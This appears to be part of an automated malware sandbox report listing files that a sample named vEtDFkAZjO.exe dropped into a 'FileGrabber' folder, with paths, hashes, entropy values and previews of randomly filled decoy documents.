NMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\138727\FileGrabber\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\JSDNGYCOWY.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYP